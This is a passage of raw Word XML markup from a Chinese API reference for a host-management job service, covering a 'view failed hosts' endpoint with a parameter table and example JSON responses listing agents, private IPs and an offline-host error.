          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hostTagList</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host.assetLevel</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data.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"7001"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"82f68fb82ce4d865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"localhost"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>host.hasDeleted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w: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_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>trimmed_fields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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host.agentStatus</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host.displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.146.136"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>data.ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"127.0.0.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total"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C4BA70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rows字段说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A310015" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>rows 为List&lt;Map&gt; 类型, 字段名可以根据fields中获取到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DCCB3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="399" w:name="_Toc115166272"/>
      <w:bookmarkStart w:id="400" w:name="查看失败主机"/>
      <w:bookmarkEnd w:id="398"/>
      <w:r>
        <w:t>查看失败主机</w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
    </w:p>
    <w:p w14:paraId="756DEA67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C66C4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/task/error/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taskRecordId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B359B9E"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452"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="2311"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="593C3AC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29FC779" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76B46D4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02D24F63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42175802" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76A84F91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskRecordId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32016C02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B9945CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业的task执行记录id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="149827DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DE250" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/task/error/5d1d61c423e46813eb98f514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1FE42A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B80F594" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"row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id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"5d11f50b25d891243fb540c8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"acd675759d37d865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.135.132"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"192.168.135.132"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>externalIp</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hostNam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localhost.localdomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"group"</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"未分组主机"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"remark"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"server组"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>hostTag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server-4"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</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error"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"主机</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>在线"</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5d11f50c25d891243fb540c9"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"034a6e7b17558865"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"172.20.0.1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"172.20.0.1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</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hostName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"ubuntu"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"group"</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>groupName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"test"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"remark"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
